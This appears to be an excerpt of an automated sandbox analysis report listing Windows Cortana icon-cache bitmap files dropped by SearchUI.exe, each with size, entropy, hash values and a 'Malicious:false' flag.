                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Office_OneNote_8wekyb3d8bbwe!microsoft_onenoteim
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):3.4122620206830856
                      Encrypted:false
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Office_POWERPNT_EXE_15
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):4.428484236846765
                      Encrypted:false
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Office_SETLANG_EXE_15
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):1.5522273155132176
                      Encrypted:false
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Office_WINWORD_EXE_15
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):4.922448732093031
                      Encrypted:false
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_OneConnect_8wekyb3d8bbwe!App
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):1.0485117818645842
                      Encrypted:false
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_PPIProjection_cw5n1h2txyewy!Microsoft_PPIProjection
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):1.5027770058776797
                      Encrypted:false
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_People_8wekyb3d8bbwe!x4c7a3b7dy2188y46d4ya362y19ac5a5805e5x
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):1.1017212416251607
                      Encrypted:false
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Print3D_8wekyb3d8bbwe!App
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):1.1655331569839995
                      Encrypted:false
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_WindowsAlarms_8wekyb3d8bbwe!App
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):1.411243535025411
                      Encrypted:false
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_WindowsCalculator_8wekyb3d8bbwe!App
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):1.174084062657408
                      Encrypted:false
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_WindowsCamera_8wekyb3d8bbwe!App
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):0.8944539442401032
                      Encrypted:false
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_WindowsMaps_8wekyb3d8bbwe!App
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):1.122762277059158
                      Encrypted:false
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_WindowsSoundRecorder_8wekyb3d8bbwe!App
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):1.1808408973860614
                      Encrypted:false
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_WindowsStore_8wekyb3d8bbwe!App
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):1.1004950220477427
                      Encrypted:false
                      SSDEEP:12:mqYmu4TVVVVq3TVVVVq3TVVVVq3TVVVVq3TVVVVq3TVVVVq5fJaJfJaJfJaJfJaR:mqYGGGGG58J8J8J8J8J8gM
                      MD5:38720C9B356A00DDE6E028B02E5E735C
                      SHA1:2345D6624BD11E17C1532FB5F198441E2C06B723
                      SHA-256:D6695C619CB61B5C94BA41F0C2BE56C2DAFE7E43D39BAC35DF7F9EBB162ED930
                      SHA-512:BCD039D65BF09C72D90815D1A63BE5396565E9B53A083B0D6183990FC04D54A3DD3015BC58F7A584983C97A83AA64C20ED0D665F2A0AD7193E069297FE92862C
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_AdministrativeTools
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):3.9760266392815717
                      Encrypted:false
                      SSDEEP:192:G4wYPImLWJCFvzKKOX9Qa6jWoNJn2LPnxXzG+9rqO:qyzKKOXYxCZTr
                      MD5:C0AD9BD2329A9CA3C3E34331BE950627
                      SHA1:B98DD9F8706EA9BECA0CCAC1F4F20B21D20AC8DA
                      SHA-256:26EB5FC9002181CB1194126E53F74FD0271BD952716200C790B6C14A99D25DAE
                      SHA-512:21FFD65DD7D163B4751EB087E978462B4034C59DB98E938BB11DF308C5D6F95A5B7FABC04B22AC3CFC213E4C13F63510E5163BFCD165D91BEA92B5971280EEB1
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_Computer
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):3.3874276249544146
                      Encrypted:false
                      SSDEEP:192:/mtq+E0AfJlh2/rfMYG7lOOOOl8iLyk0FFLMFFFmMFFF0MFFF0MFFF5MFFslgNBM:p0ARlh2/rndnddGLIQdnh+RIp
                      MD5:4C670DD3A6599F46A4FF55714879C8DB
                      SHA1:597568545FA7351902945F00B3EC7345CAC5EEF3
                      SHA-256:E7A88DD960478A49EEBAA28E6AC7112BAA092F75F4A690F340EFBBC603F9E1CE
                      SHA-512:F0AD5A1BD4DA935E649DAFF6B922DB25967C14057461D5846820F59B200C8F0686137E4322BCADA71EBBC425F49A495F5D109E943A4545331CE05E5896031A9F
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_ControlPanel
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):3.874824021661371
                      Encrypted:false
                      SSDEEP:384:szMgXGKheIII8SVFBSQ8xFLlSLQU7lbdozJbQt1A+svJC3X:BIII5zb7larNvJ
                      MD5:FB5F8866E1F4C9C1C7F4D377934FF4B2
                      SHA1:D0A329E387FB7BCBA205364938417A67DBB4118A
                      SHA-256:1649EC9493BE27F76AE7304927D383F8A53DD3E41EA1678BACAFF33120EA4170
                      SHA-512:0FBE2843DFEAB7373CDE0643B20C073FDC2FCBEFC5AE581FD1656C253DFA94E8BBA4D348E95CC40D1E872456ECCA894B462860AEAC8B92CEDB11A7CAD634798C
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_Cortana_cw5n1h2txyewy!CortanaUI
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):1.0146113403856278
                      Encrypted:false
                      SSDEEP:48:c/Vi8Vi8Vi8Vi8Vi8Vi8Vi8Vi8Vi89i89ifXyiZLHfLLTmlikU:irrrrrrrrTTWXygPTMxU
                      MD5:803CAA0680F77BC53B96047D448BECB2
                      SHA1:F9D5DC3BC072D0F57821C54B2AC1CC18B0A06B27
                      SHA-256:C3DF45F93A209CE209B983B39E2DEFC557AA86B2CFBC5D4995AD856188F45674
                      SHA-512:C7F87E40DB0C05412FB56CAC5E0A9C743DFF6DA4D660FDEB9ADA6FDF2E24F8656A94AABDD971CC1578F265B17F2BAAB248E1F389F4333C251040A4B9D77C4131
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_Explorer
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):2.685688058378997
                      Encrypted:false
                      SSDEEP:768:qVv6VlVMVHVVVVVVVVVVVVVVVVVVVVVVVVVgJJJJJJX:
                      MD5:DCA313EEB2FD1F494BBE186842EB2E96
                      SHA1:4737635D62DAB597FDC20F98893760098D1067BA
                      SHA-256:26017802A8D504A9A78588F400CD4312848ACA69BE6A11DF33281BDE25396B2B
                      SHA-512:62D3540191B1DE9E65A568D97B1D16320DAF883BF18219340B5594EFB2987B3A2299C47268A76B17DBC5C058CD89BA669607E945922B745FF874D7A729D3BAC3
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_MediaPlayer32
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):4.417905730161295
                      Encrypted:false
                      SSDEEP:384:lRM8MnnhRJPv8iHMiJ07HLwLwmjjujjR5m694lN444y84444UV4444K7444444R5:7jUnhDrHMiS7rwLwmjjujj/mZAZ7rzN
                      MD5:E1AA86A6110404C34E05C063601112AD
                      SHA1:0680868AEE468FCE12215D90684C4C7CF7769B34
                      SHA-256:AF63B4E541130D09289A3C6852DE203F2723792BAB7464559459A732D553F8BD
                      SHA-512:FCE875B8AB57AE028C3BDD3ADC645075BABB7244A9C3338ABF2CE871E56722C895610ED2001C1C84DE34C2837616BA3664839E0985F42FF164B1549E909C07C0
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_Photos_8wekyb3d8bbwe!App
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):0.9236847415032687
                      Encrypted:false
                      SSDEEP:6:mqtgX/mu0000000000000000000000000000000000000000000000000000000j:mqYmuKaegnC3FJVfy01qlHy9FXXX1
                      MD5:4C9E2799DEB40FFAE060F49AC2803C80
                      SHA1:D25F5CF3BC3E3627C9BD87DADC18422CC49A6328
                      SHA-256:B7F489CF209EB744097F4A374C1045A3896C789686B4BE5AA7C576267C29EFC4
                      SHA-512:DC5322025F5EBC4B2E290C8315A36518E2DF78D3D01580AC9FAFE10B4C59B35F4032194E1D9189377388EF30729C62FD6C8825EE00908630F244CC59C0D1E976
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_Photos_8wekyb3d8bbwe!SecondaryEntry
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):0.9514927819801636
                      Encrypted:false
                      SSDEEP:12:mqYmuU/HeH3LCHmhH9fNmxPmtHPG1HPtUND6PuHPutHPfDTPfHPfH/V:mqL
                      MD5:8DB89B48B8EDBB416F60B9B79F46E024
                      SHA1:6E6E9D89BD3D1D8B7F244BBB2A45C386776121EE
                      SHA-256:2B1547CA7FF16B7159B312258D0853E1D9216BE5E27748F59FF6B454B69DF684
                      SHA-512:1852683B6F744D1D08C35D0AA4467F798D374F6A2C8E11E86BEF1A2C390E089C2ED749BEE5AFDDABBE071BA60E22C8C509D65477621D15CEE5962EDCC6907324
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_RemoteDesktop
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):4.50665318619026
                      Encrypted:false
                      SSDEEP:384:FTU0p6EZl8eBZXd+53Nq2MsNeN4DXtaokxN/yxHgpOI1SpIFp:FTU0p6Ul8AMNq2DN1XtaryupOI1Sp
                      MD5:C29EF40B14D06595314AB1F6634EE474
                      SHA1:FAF7420E380424794DAE3192186F4E5263D1EC1C
                      SHA-256:4121EC51B50F6B8D459C56D92058AF3AC611B00D7245D7B39145D47445E7273F
                      SHA-512:60A472A5867D3FC79E5023EC260FD00DD48D207423B336A9C7393FD8A7303E88B2AECB005F652F2A983D522EC878011DBE797FF56BCF9079A43A4E971F8F4531
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_SecHealthUI_cw5n1h2txyewy!SecHealthUI
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):0.812156585837869
                      Encrypted:false
                      SSDEEP:6:mqtgX/mu0000000000000000000000000000000000000000000000000000000X:mqYmuma6mSGS62fvKC7KQ
                      MD5:B2D6871398C3A84AD2DFC54633867A33
                      SHA1:460CCC1F7902B7A128BF0C6B2B3810B5B3022DDB
                      SHA-256:603FD28808B3250170EEB8569129A8FCBA1A7CE5A7F94B66907D829D6B9C1256
                      SHA-512:77609DBFC00C450E489C3966B16F18D4190BED102E8143BFF6D998785C780B763998357ECAF184D48BA3E35014BB3562092118F38CAF2874D91240F8D8AC32B9
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_Shell_RunDialog
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):2.0710208312018605
                      Encrypted:false
                      SSDEEP:768:XmmmmmmmmmmmmmmmmmmmmmmmmmmmmmLuTgKqvO0y1S7M08YHyHvwaKwZjLV2y4R5:9ZN+dh
                      MD5:0CA04AEE62BDD5F8941D065E72B4575B
                      SHA1:ACE12ED4A8A453E42FDAB7FFEE2070445954B4B0
                      SHA-256:B0721630850601FC849068539AA7D4984EB3A959F2D40ACACEC1AB0FFC9CEB3B
                      SHA-512:A9B8498F2DB9E9C880C346F557E6E6D75AD2866C9D42991D763E78B1BB4A7EEB1ED444A35051AAF5648F8416D7CBD569E07C24048D110C12882321ADE493DBB5
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_YourPhone_8wekyb3d8bbwe!App
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):1.8439686281042036
                      Encrypted:false
                      SSDEEP:6:mqtgX/0FGCCCCCCCCCCCCCCCCO3GCCCCCCCCCCCCCCCCO3GCCCCCCCCCCCCCCCCf:mqYobbbbbbbHHHHHHHHHHe0WpW0W0
                      MD5:45CF23B43ADC915875D3F4E4DE2BCDA1
                      SHA1:F513D85D749F6EB03FD54F8D09095C6331093D64
                      SHA-256:F4CB027B2479815B061FF2696E760E8E5A5EF50FDC968D93F3DC7DF0F24B256F
                      SHA-512:A2E5D9C548CD2D7CE27AC3D25D0A4359DE517791E3C03F775B6397DC285FE811A5D9E7D2A0A5491BE50CEDE09389AAC779896182B963A36B2E1F74C259DA2A0E
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_ZuneMusic_8wekyb3d8bbwe!Microsoft_ZuneMusic
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):1.0175256814770415
                      Encrypted:false
                      SSDEEP:12:mqYmuOHe7r6qPSf6TaSviiaiPbaLzr/C6C2rSbaLniKifaSCfDveWKLe7/:mq7rqP3uv/Ou3//vWunvHrWWeY
                      MD5:133B21D2FD5A8456BB6C631470E70DC2
                      SHA1:14EC35EDCCE2EB9F913655AE9AADC89ED338F4DE
                      SHA-256:85AB82DEACF5A3DC31BBC2691443E1AD7769B7ABE26952B42E1B29DF7FDDC03C
                      SHA-512:8EEFC8AFBABA64D68D163A021F4A51E551B4FF709CA3C77EFA78085835EFB51A132AF829B5AF89C981E7096828A6782FE5284F46A0C68E7CA92B9A6D2D750B87
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_ZuneVideo_8wekyb3d8bbwe!Microsoft_ZuneVideo
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):0.829578043990811
                      Encrypted:false
                      SSDEEP:6:mqtgX/mu00000000000000000000000000000000000000000000000000000003:mqYmuyLbeOb72b22ebOQ
                      MD5:52A68F652E4564B0982F2871E9C689A8
                      SHA1:F0980F219E8066C9D1E2A3D69DB9A23D5AB3B263
                      SHA-256:4DB290AC285B4D57A2CA70D9A36677936F7C71FD0E1B01CE65EBC0D90FD50007
                      SHA-512:2EDDFF16B382CE6DFFE54046CA155ED41A169AF1631A57F4A9FDEAD5665C4C0AB8715A2C0FC20B440343E568C960022F954A96015059B66BC6988C04F49492EC
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\https___java_com_
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):2.637977059894628
                      Encrypted:false
                      SSDEEP:768:XmmmmmmmmmmmmmmmmmmmmmydiXjPJdKQ7ai3ZigbmY9//JD9UZ99tS0FVGn4YEbR:fig1Z
                      MD5:8AAAD0F4EB7D3C65F81C6E6B496BA889
                      SHA1:231237A501B9433C292991E4EC200B25C1589050
                      SHA-256:813C66CE7DEC4CFF9C55FB6F809EAB909421E37F69FF30E4ACAA502365A32BD1
                      SHA-512:1A83CE732DC47853BF6E8F4249054F41B0DEA8505CDA73433B37DFA16114F27BFED3B4B3BA580AA9D53C3DCC8D48BF571A45F7C0468E6A0F2A227A7E59E17D62
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\microsoft_windowscommunicationsapps_8wekyb3d8bbwe!microsoft_windowslive_calendar
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):1.0051505361061857
                      Encrypted:false
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\microsoft_windowscommunicationsapps_8wekyb3d8bbwe!microsoft_windowslive_mail
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):0.7469853921101441
                      Encrypted:false
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\windows_immersivecontrolpanel_cw5n1h2txyewy!microsoft_windows_immersivecontrolpanel
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):1.106127270747805
                      Encrypted:false
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_MdSched_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):5.807418763306762
                      Encrypted:false
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_RecoveryDrive_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):2.8183363519681013
                      Encrypted:false
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_SnippingTool_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):3.8115189780206427
                      Encrypted:false
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WF_msc
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):5.472339933770682
                      Encrypted:false
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WindowsPowerShell_v1_0_PowerShell_ISE_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):4.233098316757873
                      Encrypted:false
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WindowsPowerShell_v1_0_powershell_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):4.159960702416083
                      Encrypted:false
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_charmap_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):3.6072689234247903
                      Encrypted:false
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_cleanmgr_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):3.128048266493635
                      Encrypted:false
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_comexp_msc
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):4.349819870712939
                      Encrypted:false
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_dfrgui_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):4.414692463303285
                      Encrypted:false
